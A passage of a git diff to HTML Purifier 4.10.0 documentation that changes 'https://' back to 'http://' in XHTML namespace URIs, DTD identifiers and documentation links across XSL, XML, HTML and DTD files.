class="description"> - <xsl:copy-of xmlns:xhtml="https://www.w3.org/1999/xhtml" select="xhtml:div/node()" /> + <xsl:copy-of xmlns:xhtml="http://www.w3.org/1999/xhtml" select="xhtml:div/node()" /> </div> </xsl:template> @@ -163,7 +163,7 @@ </xsl:template> <xsl:template match="directive/description"> <div class="description"> - <xsl:copy-of xmlns:xhtml="https://www.w3.org/1999/xhtml" select="xhtml:div/node()" /> + <xsl:copy-of xmlns:xhtml="http://www.w3.org/1999/xhtml" select="xhtml:div/node()" /> </div> </xsl:template> <xsl:template match="directive/deprecated"> diff --git a/htmlpurifier-4.10.0/configdoc/types.xml b/htmlpurifier-4.10.0/configdoc/types.xml index d4d091e..f394cee 100755 --- a/htmlpurifier-4.10.0/configdoc/types.xml +++ b/htmlpurifier-4.10.0/configdoc/types.xml @@ -1,44 +1,44 @@ <?xml version="1.0" encoding="UTF-8"?> <types> - <type id="string" name="String"><div xmlns="https://www.w3.org/1999/xhtml"> + <type id="string" name="String"><div xmlns="http://www.w3.org/1999/xhtml"> A <a - href="https://docs.php.net/manual/en/language.types.string.php">sequence + href="http://docs.php.net/manual/en/language.types.string.php">sequence of characters</a>. </div></type> - <type id="istring" name="Case-insensitive string"><div xmlns="https://www.w3.org/1999/xhtml"> + <type id="istring" name="Case-insensitive string"><div xmlns="http://www.w3.org/1999/xhtml"> A series of case-insensitive characters. Internally, upper-case ASCII characters will be converted to lower-case. </div></type> - <type id="text" name="Text"><div xmlns="https://www.w3.org/1999/xhtml"> + <type id="text" name="Text"><div xmlns="http://www.w3.org/1999/xhtml"> A series of characters that may contain newlines. Text tends to indicate human-oriented text, as opposed to a machine format. </div></type> - <type id="itext" name="Case-insensitive text"><div xmlns="https://www.w3.org/1999/xhtml"> + <type id="itext" name="Case-insensitive text"><div xmlns="http://www.w3.org/1999/xhtml"> A series of case-insensitive characters that may contain newlines. </div></type> - <type id="int" name="Integer"><div xmlns="https://www.w3.org/1999/xhtml"> + <type id="int" name="Integer"><div xmlns="http://www.w3.org/1999/xhtml"> An <a - href="https://docs.php.net/manual/en/language.types.integer.php"> + href="http://docs.php.net/manual/en/language.types.integer.php"> integer</a>. You are alternatively permitted to pass a string of digits instead, which will be cast to an integer using <code>(int)</code>. </div></type> - <type id="float" name="Float"><div xmlns="https://www.w3.org/1999/xhtml"> - A <a href="https://docs.php.net/manual/en/language.types.float.php"> + <type id="float" name="Float"><div xmlns="http://www.w3.org/1999/xhtml"> + A <a href="http://docs.php.net/manual/en/language.types.float.php"> floating point number</a>. You are alternatively permitted to pass a numeric string (as defined by <code>is_numeric()</code>), which will be cast to a float using <code>(float)</code>. </div></type> - <type id="bool" name="Boolean"><div xmlns="https://www.w3.org/1999/xhtml"> + <type id="bool" name="Boolean"><div xmlns="http://www.w3.org/1999/xhtml"> A <a - href="https://docs.php.net/manual/en/language.types.boolean.php">boolean</a>. + href="http://docs.php.net/manual/en/language.types.boolean.php">boolean</a>. You are alternatively permitted to pass an integer <code>0</code> or <code>1</code> (other integers are not permitted) or a string <code>"on"</code>, <code>"true"</code> or <code>"1"</code> for <code>true</code>, and <code>"off"</code>, <code>"false"</code> or <code>"0"</code> for <code>false</code>. </div></type> - <type id="lookup" name="Lookup array"><div xmlns="https://www.w3.org/1999/xhtml"> + <type id="lookup" name="Lookup array"><div xmlns="http://www.w3.org/1999/xhtml"> An array whose values are <code>true</code>, e.g. <code>array('key' => true, 'key2' => true)</code>. You are alternatively permitted to pass an array list of the keys <code>array('key', 'key2')</code> @@ -47,20 +47,20 @@ strictly numerically indexed: <code>array('key1', 2 => 'key2')</code> will not do what you expect and emits a warning. </div></type> - <type id="list" name="Array list"><div xmlns="https://www.w3.org/1999/xhtml"> + <type id="list" name="Array list"><div xmlns="http://www.w3.org/1999/xhtml"> An array which has consecutive integer indexes, e.g. <code>array('val1', 'val2')</code>. You are alternatively permitted to pass a comma-separated string of keys <code>"val1, val2"</code>. If your array is not in this form, <code>array_values</code> is run on the array and a warning is emitted. </div></type> - <type id="hash" name="Associative array"><div xmlns="https://www.w3.org/1999/xhtml"> + <type id="hash" name="Associative array"><div xmlns="http://www.w3.org/1999/xhtml"> An array which is a mapping of keys to values, e.g. <code>array('key1' => 'val1', 'key2' => 'val2')</code>. You are alternatively permitted to pass a comma-separated string of key-colon-value strings, e.g. <code>"key1: val1, key2: val2"</code>. </div></type> - <type id="mixed" name="Mixed"><div xmlns="https://www.w3.org/1999/xhtml"> + <type id="mixed" name="Mixed"><div xmlns="http://www.w3.org/1999/xhtml"> An arbitrary PHP value of any type. </div></type> </types> diff --git a/htmlpurifier-4.10.0/docs/dev-advanced-api.html b/htmlpurifier-4.10.0/docs/dev-advanced-api.html index 8c11366..4002fb8 100755 --- a/htmlpurifier-4.10.0/docs/dev-advanced-api.html +++ b/htmlpurifier-4.10.0/docs/dev-advanced-api.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Specification for HTML Purifier's advanced API for defining custom filtering behavior." /> <link rel="stylesheet" type="text/css" href="style.css" /> @@ -14,7 +14,7 @@ <div id="filing">Filed under Development</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p> Please see <a href="enduser-customize.html">Customize!</a> diff --git a/htmlpurifier-4.10.0/docs/dev-config-schema.html b/htmlpurifier-4.10.0/docs/dev-config-schema.html index 3384e98..9bab798 100755 --- a/htmlpurifier-4.10.0/docs/dev-config-schema.html +++ b/htmlpurifier-4.10.0/docs/dev-config-schema.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Describes config schema framework in HTML Purifier." /> @@ -14,7 +14,7 @@ <div id="filing">Filed under Development</div> <div id="index">Return to the <a href="index.html">index</a>.</div> - <div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + <div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p> HTML Purifier has a fairly complex system for configuration. Users @@ -39,7 +39,7 @@ couldn't think of a more descriptive file extension.) Directive files are actually what we call <code>StringHash</code>es, i.e. associative arrays represented in a string form reminiscent of - <a href="https://qa.php.net/write-test.php">PHPT</a> tests. Here's a + <a href="http://qa.php.net/write-test.php">PHPT</a> tests. Here's a sample directive file, <code>Test.Sample.txt</code>: </p> @@ -179,7 +179,7 @@ Test.Example</pre> <tr> <td>string</td> <td>'Foo'</td> - <td><a href="https://docs.php.net/manual/en/language.types.string.php">String</a> without newlines</td> + <td><a href="http://docs.php.net/manual/en/language.types.string.php">String</a> without newlines</td> </tr> <tr> <td>istring</td> @@ -239,15 +239,15 @@ Test.Example</pre> object; users have a little bit of leeway when setting configuration values (for example, a lookup value can be specified as a list; HTML Purifier will flip it as necessary.) These types are defined - in <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/VarParser.php"> + in <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/VarParser.php"> library/HTMLPurifier/VarParser.php</a>. </p> <p> For more information on what values are allowed, and how they are parsed, - consult <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php"> + consult <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php"> library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php</a>, as well - as <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Interchange/Directive.php"> + as <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Interchange/Directive.php"> library/HTMLPurifier/ConfigSchema/Interchange/Directive.php</a> for the semantics of the parsed values. </p> @@ -307,7 +307,7 @@ Test.Example</pre> <p> All directive files go through a rigorous validation process - through <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Validator.php"> + through <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Validator.php"> library/HTMLPurifier/ConfigSchema/Validator.php</a>, as well as some basic checks during building. While listing every error out here is out-of-scope for this document, we @@ -374,7 +374,7 @@ Test.Example</pre> The most difficult part is translating the Interchange member variable (valueAliases) into a directive file key (VALUE-ALIASES), but there's a one-to-one correspondence currently. If the two formats diverge, any discrepancies - will be described in <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php"> + will be described in <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php"> library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php</a>. </p> diff --git a/htmlpurifier-4.10.0/docs/dev-flush.html b/htmlpurifier-4.10.0/docs/dev-flush.html index e20a5f8..0fddafc 100755 --- a/htmlpurifier-4.10.0/docs/dev-flush.html +++ b/htmlpurifier-4.10.0/docs/dev-flush.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Discusses when to flush HTML Purifier's various caches." /> @@ -14,7 +14,7 @@ <div id="filing">Filed under Development</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p> If you've been poking around the various folders in HTML Purifier, diff --git a/htmlpurifier-4.10.0/docs/dev-naming.html b/htmlpurifier-4.10.0/docs/dev-naming.html index 50a878e..4060005 100755 --- a/htmlpurifier-4.10.0/docs/dev-naming.html +++ b/htmlpurifier-4.10.0/docs/dev-naming.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Defines class naming conventions in HTML Purifier." /> <link rel="stylesheet" type="text/css" href="./style.css" /> @@ -14,7 +14,7 @@ <div id="filing">Filed under Development</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p>The classes in this library follow a few naming conventions, which may help you find the correct functionality more quickly. Here they are:</p> diff --git a/htmlpurifier-4.10.0/docs/dev-optimization.html b/htmlpurifier-4.10.0/docs/dev-optimization.html index cb429fc..681e034 100755 --- a/htmlpurifier-4.10.0/docs/dev-optimization.html +++ b/htmlpurifier-4.10.0/docs/dev-optimization.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Discusses possible methods of optimizing HTML Purifier." /> <link rel="stylesheet" type="text/css" href="./style.css" /> @@ -14,7 +14,7 @@ <div id="filing">Filed under Development</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p>Here are some possible optimization techniques we can apply to code sections if they turn out to be slow. Be sure not to prematurely optimize: if you get diff --git a/htmlpurifier-4.10.0/docs/dev-progress.html b/htmlpurifier-4.10.0/docs/dev-progress.html index 06adfd1..2243b82 100755 --- a/htmlpurifier-4.10.0/docs/dev-progress.html +++ b/htmlpurifier-4.10.0/docs/dev-progress.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Tables detailing HTML element and CSS property implementation coverage in HTML Purifier." /> <link rel="stylesheet" type="text/css" href="./style.css" /> @@ -32,7 +32,7 @@ thead th {text-align:left;padding:0.1em;background-color:#EEE;} <div id="filing">Filed under Development</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p> <strong>Warning:</strong> This table is kept for historical purposes and diff --git a/htmlpurifier-4.10.0/docs/dtd/xhtml1-transitional.dtd b/htmlpurifier-4.10.0/docs/dtd/xhtml1-transitional.dtd index e81f49d..e20c895 100755 --- a/htmlpurifier-4.10.0/docs/dtd/xhtml1-transitional.dtd +++ b/htmlpurifier-4.10.0/docs/dtd/xhtml1-transitional.dtd @@ -4,9 +4,9 @@ This is the same as HTML 4 Transitional except for changes due to the differences between XML and SGML. - Namespace = https://www.w3.org/1999/xhtml + Namespace = http://www.w3.org/1999/xhtml - For further information, see: https://www.w3.org/TR/xhtml1 + For further information, see: http://www.w3.org/TR/xhtml1 Copyright (c) 1998-2002 W3C (MIT, INRIA, Keio), All Rights Reserved. @@ -14,7 +14,7 @@ This DTD module is identified by the PUBLIC and SYSTEM identifiers: PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - SYSTEM "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" + SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" $Revision: 1.2 $ $Date: 2002/08/01 18:37:55 $ @@ -274,7 +274,7 @@ <!ATTLIST html %i18n; id ID #IMPLIED - xmlns %URI; #FIXED 'https://www.w3.org/1999/xhtml' + xmlns %URI; #FIXED 'http://www.w3.org/1999/xhtml' > <!--================ Document Head =======================================--> diff --git a/htmlpurifier-4.10.0/docs/enduser-customize.html b/htmlpurifier-4.10.0/docs/enduser-customize.html index 06d3797..0849616 100755 --- a/htmlpurifier-4.10.0/docs/enduser-customize.html +++ b/htmlpurifier-4.10.0/docs/enduser-customize.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Tutorial for customizing HTML Purifier's tag and attribute sets." /> <link rel="stylesheet" type="text/css" href="style.css" /> @@ -15,7 +15,7 @@ <div id="filing">Filed under End-User</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p> HTML Purifier has this quirk where if you try to allow certain elements or @@ -44,7 +44,7 @@ <p> All of the modules listed below are based off of the - <a href="https://www.w3.org/TR/2001/REC-xhtml-modularization-20010410/abstract_modules.html#sec_5.2.">modularization of + <a href="http://www.w3.org/TR/2001/REC-xhtml-modularization-20010410/abstract_modules.html#sec_5.2.">modularization of XHTML</a>, which, while technically for XHTML 1.1, is quite a useful resource. </p> @@ -76,7 +76,7 @@ <p> As of HTMLPurifier 2.1.0, we have implemented the - <a href="https://www.w3.org/TR/2001/REC-ruby-20010531/">Ruby module</a>, + <a href="http://www.w3.org/TR/2001/REC-ruby-20010531/">Ruby module</a>, which defines a set of tags for publishing short annotations for text, used mostly in Japanese and Chinese school texts, but applicable for positioning any text (not @@ -86,7 +86,7 @@ <h3>HTML 5</h3> <p> - <a href="https://www.whatwg.org/specs/web-apps/current-work/">HTML 5</a> + <a href="http://www.whatwg.org/specs/web-apps/current-work/">HTML 5</a> is a fork of HTML 4.01 by WHATWG, who believed that XHTML 2.0 was headed in the wrong direction. It too is a working draft, and may change drastically before publication, but it should be noted that the @@ -354,10 +354,10 @@ $def = $config->getHTMLDefinition(true); <p> For a complete list, consult - <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/AttrTypes.php"><code>library/HTMLPurifier/AttrTypes.php</code></a>; + <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/AttrTypes.php"><code>library/HTMLPurifier/AttrTypes.php</code></a>; more information on attributes that accept parameters can be found on their respective includes in - <a href="https://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/AttrDef"><code>library/HTMLPurifier/AttrDef</code></a>. + <a href="http://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/AttrDef"><code>library/HTMLPurifier/AttrDef</code></a>. </p> <p> @@ -655,7 +655,7 @@ $def = $config->getHTMLDefinition(true); <p class="aside"> Readers familiar with the modularization may have noticed that the Core attribute collection differs from that specified by the <a - href="https://www.w3.org/TR/xhtml-modularization/abstract_modules.html#s_commonatts">abstract + href="http://www.w3.org/TR/xhtml-modularization/abstract_modules.html#s_commonatts">abstract modules of the XHTML Modularization 1.1</a>. We believe this section to be in error, as <code>br</code> permits the use of the <code>style</code> attribute even though it uses the <code>Core</code> collection, and @@ -676,7 +676,7 @@ $def = $config->getHTMLDefinition(true); <p> We're going to implement <code>form</code>. Before we embark, lets grab a reference implementation from over at the - <a href="https://www.w3.org/TR/html4/sgml/loosedtd.html">transitional DTD</a>: + <a href="http://www.w3.org/TR/html4/sgml/loosedtd.html">transitional DTD</a>: </p> <pre><!ELEMENT FORM - - (%flow;)* -(FORM) -- interactive form --> @@ -746,7 +746,7 @@ $form->excludes = array('form' => true);</strong></pre> <p> And that's all there is to it! Implementing the rest of the form module is left as an exercise to the user; to see more examples - check the <a href="https://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/HTMLModule"><code>library/HTMLPurifier/HTMLModule/</code></a> directory + check the <a href="http://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/HTMLModule"><code>library/HTMLPurifier/HTMLModule/</code></a> directory in your local HTML Purifier installation. </p> @@ -771,8 +771,8 @@ $form->excludes = array('form' => true);</strong></pre> </p> <ul> - <li><a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/HTMLModule.php"><code>library/HTMLPurifier/HTMLModule.php</code></a></li> - <li><a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ElementDef.php"><code>library/HTMLPurifier/ElementDef.php</code></a></li> + <li><a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/HTMLModule.php"><code>library/HTMLPurifier/HTMLModule.php</code></a></li> + <li><a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ElementDef.php"><code>library/HTMLPurifier/ElementDef.php</code></a></li> </ul> <h2 id="optimized">Notes for HTML Purifier 4.2.0 and earlier</h3> @@ -831,7 +831,7 @@ $purifier = new HTMLPurifier($config);</pre> <p> <em>Technical notes:</em> ajh pointed out on <a - href="https://htmlpurifier.org/phorum/read.php?5,5164,5169#msg-5169">in a forum topic</a> that + href="http://htmlpurifier.org/phorum/read.php?5,5164,5169#msg-5169">in a forum topic</a> that HTML Purifier appeared to be repeatedly writing to the cache even when a cache entry already existed. Investigation lead to the discovery of the following infelicity: caching of customized diff --git a/htmlpurifier-4.10.0/docs/enduser-id.html b/htmlpurifier-4.10.0/docs/enduser-id.html index 3dc9eae..9fb3536 100755 --- a/htmlpurifier-4.10.0/docs/enduser-id.html +++ b/htmlpurifier-4.10.0/docs/enduser-id.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Explains various methods for allowing IDs in documents safely in HTML Purifier." /> <link rel="stylesheet" type="text/css" href="./style.css" /> @@ -15,7 +15,7 @@ <div id="filing">Filed under End-User</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p>Prior to HTML Purifier 1.2.0, this library blithely accepted user input that looked like this:</p> diff --git a/htmlpurifier-4.10.0/docs/enduser-slow.html b/htmlpurifier-4.10.0/docs/enduser-slow.html index 3695722..4872c94 100755 --- a/htmlpurifier-4.10.0/docs/enduser-slow.html +++ b/htmlpurifier-4.10.0/docs/enduser-slow.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Explains how to speed up HTML Purifier through caching or inbound filtering." /> <link rel="stylesheet" type="text/css" href="./style.css" /> @@ -15,7 +15,7 @@ <div id="filing">Filed under End-User</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p>HTML Purifier is a very powerful library. But with power comes great responsibility, in the form of longer execution times. Remember, this diff --git a/htmlpurifier-4.10.0/docs/enduser-tidy.html b/htmlpurifier-4.10.0/docs/enduser-tidy.html index 971d38c..b33a4c9 100755 --- a/htmlpurifier-4.10.0/docs/enduser-tidy.html +++ b/htmlpurifier-4.10.0/docs/enduser-tidy.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Tutorial for tweaking HTML Purifier's Tidy-like behavior." /> <link rel="stylesheet" type="text/css" href="style.css" /> @@ -14,7 +14,7 @@ <div id="filing">Filed under Development</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p>You've probably heard of HTML Tidy, Dave Raggett's little piece of software that cleans up poorly written HTML. Let me say it straight @@ -156,7 +156,7 @@ these transformations will not work. Sorry mates.</p> <p>You can review the rendering before and after of these transformations by consulting the <a -href="https://htmlpurifier.org/live/smoketests/attrTransform.php">attrTransform.php +href="http://htmlpurifier.org/live/smoketests/attrTransform.php">attrTransform.php smoketest</a>.</p> <h2>I like the general idea, but the specifics bug me!</h2> diff --git a/htmlpurifier-4.10.0/docs/enduser-uri-filter.html b/htmlpurifier-4.10.0/docs/enduser-uri-filter.html index 2ed96d9..b14e9c8 100755 --- a/htmlpurifier-4.10.0/docs/enduser-uri-filter.html +++ b/htmlpurifier-4.10.0/docs/enduser-uri-filter.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Tutorial for creating custom URI filters." /> <link rel="stylesheet" type="text/css" href="style.css" /> @@ -14,7 +14,7 @@ <div id="filing">Filed under End-User</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p> This is a quick and dirty document to get you on your way to writing @@ -93,7 +93,7 @@ <p> Because the URI is presented to us in this form, and not - <code>https://bob@example.com:8080/foo.php?q=string#hash</code>, it saves us + <code>http://bob@example.com:8080/foo.php?q=string#hash</code>, it saves us a lot of trouble in having to parse the URI every time we want to filter it. For the record, the above URI has the following components: </p> @@ -192,7 +192,7 @@ $uri->addFilter(new HTMLPurifier_URIFilter_<strong>NameOfFilter</strong>(), $con <p> Check the - <a href="https://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/URIFilter">URIFilter</a> + <a href="http://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/URIFilter">URIFilter</a> directory for more implementation examples, and see <a href="proposal-new-directives.txt">the new directives proposal document</a> for ideas on what could be implemented as a filter. diff --git a/htmlpurifier-4.10.0/docs/enduser-utf8.html b/htmlpurifier-4.10.0/docs/enduser-utf8.html index 3509fc1..71894d0 100755 --- a/htmlpurifier-4.10.0/docs/enduser-utf8.html +++ b/htmlpurifier-4.10.0/docs/enduser-utf8.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Describes the rationale for using UTF-8, the ramifications otherwise, and how to make the switch." /> <link rel="stylesheet" type="text/css" href="./style.css" /> @@ -22,7 +22,7 @@ own advice for sake of portability. --> <div id="filing">Filed under End-User</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a 